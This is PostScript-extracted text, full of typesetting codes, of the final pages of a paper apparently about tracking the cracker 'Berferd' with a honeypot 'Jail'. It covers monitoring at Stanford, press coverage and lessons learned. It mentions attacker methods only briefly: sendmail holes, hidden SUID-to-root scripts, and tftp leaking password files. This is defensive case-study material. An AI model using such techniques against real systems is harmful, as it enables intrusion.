y(variables)c(look)f(reasonable)i(and)g(attempted)f(to)f(maintain)h(the) g(Jail')n(s)g(own)f(special)i Fc(utmp)f Ff(entries)g(for)g(the)g(residents.) 18 b(W)m(e)11 b(had)h(to)0 1206 y(be)f(careful)f(to)g(keep)h(errors)f(in)f (the)i(setup)f(scripts)f(from)h(the)h(hacker)r(')n(s)f(eyes.)p 300 1253 1351 2 v 0 1361 a(activities.)0 1429 y(At)g(Stanford,)f(Berferd)h (was)g(causing)g(mayhem.)16 b(He)11 b(had)f(subverted)f(a)i(number)f(of)f (machines)i(and)f(probed)f(many)i(more.)k(Stephen)0 1479 y(Hansen)f(at)f (Stanford)e(and)i(T)m(sutomu)g(Shimomura)g(of)g(Los)g(Alamos)g(had)g(some)h (of)e(the)h(networks)f(bugged.)23 b(T)m(sutomu)12 b(modi\256ed)0 1529 y Fe(tcpdump)e Ff(to)f(provide)h(a)h(time-stamped)f(recording)g(of)g (each)i(packet.)k(This)11 b(allowed)f(him)g(to)g(replay)g(real-time)h (terminal)f(sessions.)0 1579 y(Berferd)g(attacked)g(many)g(systems)g(at)f (Stanford.)15 b(They)10 b(got)e(very)i(good)f(at)g(stopping)f(his)h(attacks)h (within)e(minutes)h(after)h(he)g(logged)0 1628 y(into)h(a)j(new)f(machine.)23 b(In)12 b(one)h(instance)g(they)f(watched)h(his)f(progress)h(using)f(the)g Fe(ps)h Ff(command.)23 b(His)13 b(login)e(name)j(changed)f(to)0 1678 y Fe(uucp)d Ff(and)g(then)g Fe(bin)g Ff(before)g(the)g(machine)h (\252had)g(disk)f(problems.\272)0 1746 y(Berferd)15 b(used)g(Stanford)g(as)g (a)h(base)g(for)f(many)g(months.)30 b(There)16 b(are)f(tens)h(of)e(megabytes) i(of)f(logs)g(of)f(his)h(activites.)29 b(He)16 b(had)0 1796 y(remarkable)9 b(persistence)g(at)g(a)g(very)g(boring)e(job)g(of)i(poking)e (computers.)14 b(Once)c(he)e(got)g(an)h(account)g(on)f(a)h(machine,)h(there)f (was)g(little)0 1845 y(hope)g(for)g(the)h(system)g(administrator)n(.)j (Berferd)c(had)h(a)g(\256ne)g(list)e(of)i(security)f(holes.)14 b(He)c(knew)g(obscure)g Fe(sendmail)e Ff(parameters)j(and)0 1895 y(used)g(them)g(well.)16 b(\(Y)l(es,)c(some)f Fe(sendmail)p Ff(s)f(have)i(security)e(holes)h(for)f(logged-in)f(users,)j(too.)k(Why)10 b(is)h(such)g(a)g(lar)o(ge)g(and)g(complex)0 1945 y(program)f(allowed)f(to)h (run)f(as)i Fe(r)n(oot)p Ff(?\))k(He)c(had)f(a)g(collection)f(of)h (thoroughly)d(invaded)j(machines,)h(complete)g(with)e(SUID-to-)p Fc(root)0 1995 y Ff(shell)h(scripts)g(usually)f(stored)h(in)f Fc(/usr/lib/term/.s)p Ff(.)14 b(Y)l(ou)c(do)g(not)f(want)h(to)g(give)g(him)g (an)g(account)h(on)f(your)f(computer)n(.)0 2124 y Fg(7.)21 b(Berferd)12 b(comes)e(home)83 2220 y Ff(In)i(the)g(Sunday)f(New)i(Y)l(ork)e (T)o(imes)i(on)f(21)f(April)g(1991,)h(John)g(Markof)o(f)g(broke)f(some)i(of)f (the)g(Berferd)g(story)m(.)20 b(He)13 b(said)f(that)0 2269 y(authorities)g(were)j(pursuing)e(several)h(Dutch)g(hackers,)i(but)d(were)i (unable)f(to)f(prosecute)h(them)g(because)i(hacking)d(is)h(not)f(illegal)0 2319 y(under)d(Dutch)g(law)m(.)0 2387 y(The)j(hackers)f(heard)g(about)g(the)f (article)h(within)e(a)i(day)g(or)g(so.)20 b(W)n(ietse)13 b(collected)e(some)i (mail)f(between)g(several)h(members)g(of)e(the)0 2437 y(Dutch)h(cracker)i (community)m(.)22 b(It)12 b(was)i(clear)f(that)f(they)g(had)h(bought)e(the)i (\256ction)f(of)g(our)g(machine')n(s)h(demise.)23 b(One)13 b(of)g(Berferd')n(s)0 2486 y(friends)d(found)f(it)g(strange)i(that)e(the)h(T) o(imes)h(didn')o(t)e(include)g(our)h(computer)g(in)g(the)g(list)f(of)h(those) g(damaged.)0 2554 y(On)i(1)g(May)g(Berferd)f(logged)g(into)g(the)h(Jail.)20 b(By)11 b(this)g(time)h(we)h(could)e(recognize)h(him)g(by)f(his)h(typing)e (speed)j(and)e(errors)h(and)g(the)0 2604 y(commands)i(he)g(used)f(to)f(check) i(around)f(and)g(attack.)24 b(He)14 b(probed)e(various)h(computers,)h(while)f (consulting)e(the)i(network)f Fe(whois)0 2654 y Ff(service)g(for)f(certain)g (brands)g(of)g(hosts)g(and)h(new)f(tar)o(gets.)19 b(He)11 b(did)g(not)f (break)i(into)e(any)h(of)g(the)h(machines)g(he)g(tried)e(from)h(our)g(Jail.)0 2704 y(Of)e(the)h(hundred-odd)d(sites)j(he)f(attacked,)i(three)e(noticed)g (the)g(attempts,)h(and)g(followed)e(up)h(with)f(calls)i(from)f(very)g (serious)h(security)p eop %%Page: 11 11 10 bop 0 42 a Ff(of)o(\256cers.)21 b(I)11 b(explained)h(to)f(them)h(that)f (the)h(hacker)g(was)h(legally)e(untouchable)g(as)h(far)g(as)h(I)e(knew)m(,)i (and)f(the)g(best)g(we)g(could)f(do)g(was)0 91 y(log)f(his)h(activities)f (and)i(supply)e(logs)g(to)h(the)g(victims.)17 b(Berferd)11 b(had)g(many)h(bases)g(for)f(laundering)f(his)g(connections.)18 b(It)10 b(was)i(only)0 141 y(through)d(persistence)i(and)f(luck)g(that)g(he)h (was)g(logged)f(at)g(all.)16 b(W)m(ould)9 b(the)h(system)h(administrator)e (of)h(an)h(attacked)g(machine)g(prefer)0 191 y(a)g(log)f(of)h(the)g(cracker)r (')n(s)g(attack)g(to)f(vague)i(deductions?)k(Damage)c(control)e(is)g(much)i (easier)f(when)g(the)g(actual)g(damage)h(known.)k(If)0 241 y(a)11 b(system)g(administrator)d(doesn')o(t)i(have)h(a)g(log,)e(he)i(should) e(reload)h(his)g(compromised)g(system)h(from)f(the)g(release)i(tapes.)0 308 y(The)f(systems)g(administrators)e(and)h(their)f(management)j(agreed)f (with)e(me,)j(and)e(asked)h(that)e(I)i(keep)f(the)h(Jail)f(open.)0 376 y(At)f(the)g(request)g(of)g(management)h(I)f(shut)f(the)h(Jail)g(down)g (on)f(3)h(May)m(.)16 b(Berferd)9 b(tried)f(to)g(reach)i(it)f(a)g(few)h (times,)g(and)f(went)g(away)m(.)15 b(The)0 426 y(last)10 b(I)g(heard)h(was)g (that)e(he)i(was)g(operating)e(from)h(a)h(computer)f(in)g(Sweden.)0 556 y Fg(8.)21 b(Conclusions)83 652 y Ff(For)10 b(me,)i(the)e(most)g (important)f(lesson)h(was)83 740 y Fe(if)e(a)h(hacker)h(obtains)e(a)h(login)e (on)i(a)g(machine,)g(ther)n(e)h(is)f(a)g(good)f(chance)i(he)f(can)g(become)h Fc(root)f Fe(sooner)g(or)g(later)-5 b(.)15 b(Ther)n(e)83 790 y(ar)n(e)c(many)f(buggy)g(pr)n(ograms)g(that)f(run)h(at)g(high)f(privileged)g (levels)i(that)e(offer)h(opportunities)e(for)h(a)h(cracker)-5 b(.)18 b(If)10 b(he)g(gets)83 840 y(a)g(login)f(on)h(your)g(computer)-5 b(,)11 b(you)f(ar)n(e)i(in)d(tr)n(ouble.)0 928 y Ff(Other)h(conclusions)f (are:)42 1017 y Fd(\017)20 b Ff(Though)12 b(the)g(Jail)h(was)g(an)g (interesting)e(and)h(educational)h(exercise,)h(it)e(was)h(not)f(worth)g(the)g (ef)o(fort.)22 b(It)12 b(is)g(too)g(hard)g(to)g(get)h(it)83 1066 y(right,)d(and)h(never)h(quite)e(secure.)19 b(A)11 b(better)f (arrangement)i(involves)e(a)h(throwaway)g(machine)h(with)e(real)h(security)g (holes,)g(and)83 1116 y(a)g(monitoring)d(machine)j(on)f(the)g(same)i (Ethernet)e(to)g(capture)h(the)f(bytes.)16 b(Our)10 b(version)f(of)h(the)h (monitoring)d(machine)j(had)f(the)83 1166 y(transmit)f(wire)i(in)e(the)h (transceiver)h(cable)g(cut)f(to)g(avoid)f(any)i(possibility)c(of)j(releasing) g(telltale)g(packets.)42 1243 y Fd(\017)20 b Ff(Breaking)10 b(into)f(computers)h(requires)g(a)h(good)e(list)g(of)h(security)g(holes)g (and)g(a)h(lot)e(of)h(persistence.)42 1320 y Fd(\017)20 b Ff(Processing)10 b(these)h(security)f(pokes)g(isn')o(t)f(much)i(fun)f(any)g(more.)0 1408 y(Once)i(you)f(go)f(out)h(of)g(the)g(computer)g(environment)f(that)h (you)f(control,)h(tracing)g(is)g(dif)o(\256cult.)17 b(It)10 b(can)i(involve)e(many)i(carriers,)g(law)0 1458 y(enforcement)f(agencies,)h (and)e(even)h(the)f(U.S.)h(Senate.)0 1526 y(There)j(are)f(other)g(services)g (we)h(should)e(monitor)n(.)21 b Fe(Tftp)12 b Ff(is)h(certainly)f(one:)20 b(it)12 b(easily)h(provided)e(the)i(password)g(\256le)g(from)f(a)i(lar)o(ge)0 1576 y(number)c(of)h(machines)g(I)f(tested.)16 b(I)11 b(would)e(also)i(like)f (to)g(monitor)f(unsuccessful)h(connection)g(attempts)h(to)e(unused)i(UDP)f (and)h(TCP)0 1625 y(ports)e(to)h(detect)h(unusual)e(scanners.)0 1755 y Fg(9.)21 b(Acknowledgements)83 1851 y Ff(A)9 b(number)g(of)g(people)f (worked)h(very)g(hard)g(on)f(this)g(problem.)15 b(They)9 b(include)f(Stephen) h(Hansen,)h(T)m(odd)f(Atkins,)f(and)h(others)g(at)0 1901 y(Stanford,)h(T)m (sutomu)f(Shimomura)h(of)g(Los)g(Alamos,)h(and)f(W)n(ietse)h(V)-5 b(enema)12 b(of)d(Eindhoven)g(University)m(.)14 b(Locally)m(,)d(Paul)f(Glick) f(and)0 1951 y(Diana)i(D'Angelo)e(worked)h(on)g(the)g(Jail.)15 b(Steve)c(Bellovin)e(provided)g(numerous)h(insights,)f(traps,)h(and)h(a)g (dedicated)f(bait)g(machine.)0 2000 y(Jim)g(Reeds)h(of)o(fered)g(a)f(number)h (of)f(helpful)f(suggestions.)0 2130 y Fg(10.)21 b(Refer)o(ences)173 2222 y Ff([1])f(Cheswick,)10 b(W)l(.R.)g Fe(The)g(Design)g(of)f(a)g(Secur)n (e)i(Internet)e(Gateway)n(.)15 b Ff(USENIX)9 b(Summer)i(Conference)f (Proceedings,)242 2271 y(June)h(1990.)173 2348 y([2])20 b(Stoll,)9 b(C.)h Fe(The)h(Cuckoo')-5 b(s)10 b(Egg:)k(T)n(racking)c(a)g(Spy)g(Thr)n (ough)g(the)g(Maze)g(of)f(Computer)h(Espionage.)k Ff(Pocket)d(Books,)242 2398 y(New)g(Y)l(ork,)f(1990.)0 2492 y(W)n(illiam)h(R.)h(Cheswick)f(has)h (been)g(a)g(member)h(of)e(the)h(technical)f(staf)o(f)h(in)f(the)h(Computer)e (Science)j(Research)g(division)c(of)j(A)-5 b(T&T)0 2542 y(Bell)10 b(Laboratories)h(since)g(1987.)17 b(He)11 b(has)g(worked)g(on)f(networking,)g (system)h(administration,)f(and)h(security)m(.)17 b(Previously)9 b(he)i(was)0 2591 y(a)g(system)f(programmer)h(for)e(several)i(university)d (computer)i(centers,)h(a)g(programmer)f(and)g(electrical)h(engineer)f(for)f (the)h(American)0 2641 y(Newspapers)g(Publishing)d(Association)h(Research)i (Institute,)e(and)h(a)h(contractor)f(to)f(the)h(Navy)m(.)15 b(Bill)8 b(has)h(an)g(under)o(graduate)g(degree)0 2691 y(in)h(Fundamental)g (Science)h(from)f(Lehigh)g(University)m(.)p eop %%Trailer end userdict /end-hook known{end-hook}if %%EOF